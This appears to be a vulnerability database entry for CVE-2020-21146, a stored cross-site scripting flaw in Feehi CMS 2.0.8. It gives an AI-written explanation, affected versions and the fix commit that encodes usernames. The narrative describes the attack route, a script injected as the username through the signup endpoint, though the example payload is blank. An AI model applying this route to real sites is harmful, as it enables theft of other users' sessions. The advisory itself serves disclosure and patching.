Moderate severityNVD Advisory· Published Jan 21, 2021· Updated Aug 4, 2024

CVE-2020-21146

Description

Feehi CMS 2.0.8 is affected by a cross-site scripting (XSS) vulnerability. When the user name is inserted as JavaScript code, browsing the post will trigger the XSS.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Feehi CMS 2.0.8 is vulnerable to stored XSS where an attacker can inject JavaScript as the username, triggering execution when posts are viewed.

CVE-2020-21146 describes a stored cross-site scripting (XSS) vulnerability in Feehi CMS version 2.0.8. The root cause is that the application does not sanitize or encode the username field during user registration or profile creation. When a user registers with a username containing arbitrary JavaScript code — for example, `` — the input is stored as-is in the database without proper output encoding [1][3].

An unauthenticated attacker can exploit this by registering a new account via the /index.php?r=site/signup endpoint and supplying a malicious payload as the username. After registration, any visitor who views a post authored by that user (or possibly other pages that display the username) will have the injected script executed in their browser. No special privileges are needed beyond the ability to create an account [3].

The impact is typical of stored XSS: the attacker can execute arbitrary JavaScript in the context of the victim's session, potentially stealing cookies, session tokens, or performing actions on behalf of the user. Since the payload persists in the database, any user browsing affected content is at risk [1][3].

The vulnerability has been patched in the project repository. The fix, implemented in commit e92f6877d96e53498101d0664174956e94223d6e, uses Yii2's Html::encode() method in the afterFind() event to encode the username before it is rendered, thereby neutralizing any embedded scripts [4]. Users are advised to update to the latest version or apply the patch.

References

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package	Affected versions	Patched versions
feehi/cmsPackagist	< 2.0.8.1	2.0.8.1

Affected products

Feehi/Feehi CMSdescription
ghsa-coords
pkg:composer/feehi/cms
Range: < 2.0.8.1

Patches

e92f6877d96e

fix: username xss vulnerability

https://github.com/liufee/cmsliufeeNov 3, 2019via ghsa

commit

1 file changed · +6 −0

frontend/models/User.php+6 −0 modified

@@ -11,6 +11,7 @@
 use Exception;
 use Yii;
 use common\helpers\Util;
+use yii\helpers\Html;
 
 /**
  * User model
@@ -103,4 +104,9 @@ public function beforeDelete()
         return true;
     }
 
+    public function afterFind(){
+        parent::afterFind();
+        $this->username = Html::encode($this->username);
+    }
+
 }
\ No newline at end of file

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

github.com/advisories/GHSA-v762-47vh-j7q3ghsaADVISORY
nvd.nist.gov/vuln/detail/CVE-2020-21146ghsaADVISORY
github.com/liufee/cms/commit/e92f6877d96e53498101d0664174956e94223d6eghsaWEB
github.com/liufee/cms/issues/43ghsax_refsource_MISCWEB

News mentions

No linked articles in our index yet.

cvss	0.260
epss	0.000
exploit	0.000
kev	0.000
patch	-0.070
ransomware	0.000